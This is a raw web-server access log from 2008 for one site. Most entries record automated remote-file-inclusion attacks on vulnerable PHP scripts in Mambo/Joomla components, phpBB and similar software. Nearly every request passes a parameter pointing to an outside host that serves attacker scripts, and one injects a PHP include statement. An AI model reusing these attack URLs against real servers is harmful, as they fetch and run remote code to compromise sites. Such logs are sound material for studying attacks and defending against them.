61.70.204.99 - - [25/Jun/2008:12:26:00 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:26:09 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:11 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:16 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:26:19 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:19 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:12:26:21 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:26:21 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.810" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:12:26:22 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:12:26:30 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:12:26:31 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:31 -0700] "GET /logs/access_080127.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:12:26:31 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:34 -0700] "GET /index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.144.24 - - [25/Jun/2008:12:26:35 -0700] "GET /logs/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [25/Jun/2008:12:26:35 -0700] "GET /main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:37 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:26:41 -0700] "GET /logs/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:26:41 -0700] "GET /logs/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:26:42 -0700] "GET /initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:26:54 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:26:55 -0700] "GET /initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:26:55 -0700] "GET /logs/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.232.156.10 - - [25/Jun/2008:12:27:08 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.232.156.10 - - [25/Jun/2008:12:27:08 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:12:27:15 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:12:27:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:12:27:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:27:38 -0700] "GET /logs/access_080330.log/page.php?s=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:12:27:38 -0700] "GET /logs/access_080201.log//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:12:27:39 -0700] "GET /logs/access_080201.log//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:27:44 -0700] "GET /logs/access_080330.log/page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:27:44 -0700] "GET /logs/page.php?s=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:27:48 -0700] "GET /logs/access_080212.log/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:27:49 -0700] "GET /initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:27:49 -0700] "GET /logs/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:27:50 -0700] "GET /logs/page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:27:53 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:07 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:08 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:09 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:14 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:28:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:28:30 -0700] "GET /logs/access_071225.log/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:12:28:33 -0700] "GET /logs/initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:12:28:34 -0700] "GET /initiate.php?abs_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:28:50 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:28:50 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
217.29.123.106 - - [25/Jun/2008:12:29:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://toolz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
217.29.123.106 - - [25/Jun/2008:12:29:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://toolz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:04 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:04 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:29:09 -0700] "GET /logs/initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:12:29:09 -0700] "GET /initiate.php?abs_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
119.2.47.4 - - [25/Jun/2008:12:29:19 -0700] "GET /logs/access_080212.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:12:29:26 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:12:29:29 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:29:30 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.22 - - [25/Jun/2008:12:29:31 -0700] "GET /?show=slide&pageid=17&nggpage=2 HTTP/1.1" 200 34775 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:29:33 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 200 18527 "-" "libwww-perl/5.812" "www.dmulk.com"
217.29.123.106 - - [25/Jun/2008:12:29:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://toolz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
217.29.123.106 - - [25/Jun/2008:12:29:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://toolz.t35.com/test.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:29:52 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:30:00 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:30:22 -0700] "GET /logs/access_080120.log/errors.php?error=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:30:23 -0700] "GET /errors.php?error=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:30:23 -0700] "GET /logs/errors.php?error=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:30:35 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:30:38 -0700] "GET /home.php?pagina=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:30:38 -0700] "GET /logs/home.php?pagina=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:30:51 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [25/Jun/2008:12:30:51 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:12:31:06 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:12:31:08 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32935 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:31:29 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.249.233.191 - - [25/Jun/2008:12:31:40 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunsweet.info/learn/ganteng?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:12:31:56 -0700] "GET /logs/access_080312.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:31:59 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:12:32:23 -0700] "GET /logs/index.php?body=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:12:32:25 -0700] "GET /index.php?body=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.805" "www.dmulk.com"
81.52.143.16 - - [25/Jun/2008:12:33:12 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
207.58.164.77 - - [25/Jun/2008:12:33:13 -0700] "GET /logs/access_080423.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:12:33:22 -0700] "GET /logs/errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:12:33:23 -0700] "GET /errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:33:23 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:33:23 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:33:24 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.238.140.223 - - [25/Jun/2008:12:33:57 -0700] "GET /logs/access.log//index.php?option=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.140.223 - - [25/Jun/2008:12:33:58 -0700] "GET //index.php?option=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 200 18391 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.140.223 - - [25/Jun/2008:12:33:58 -0700] "GET /logs//index.php?option=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
88.84.145.165 - - [25/Jun/2008:12:34:06 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
88.84.145.165 - - [25/Jun/2008:12:34:06 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:12:34:18 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:12:34:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.10 - - [25/Jun/2008:12:34:21 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.232.156.10 - - [25/Jun/2008:12:34:21 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:34:23 -0700] "GET /logs/index.php?option=com_battleships&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:34:25 -0700] "GET /logs/access_080312.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:34:26 -0700] "GET /logs/access_080312.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:34:26 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:34:26 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:34:26 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.120.73 - - [25/Jun/2008:12:34:26 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.dicecities.net/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:34:26 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:34:26 -0700] "GET /index.php?option=com_battleships&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 200 18559 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.120.73 - - [25/Jun/2008:12:34:27 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.dicecities.net/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:34:31 -0700] "GET /logs/access_080423.log/facileforms.frame.php?ff_compath=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:34:58 -0700] "GET /logs/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:35:04 -0700] "GET /index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.805" "www.dmulk.com"
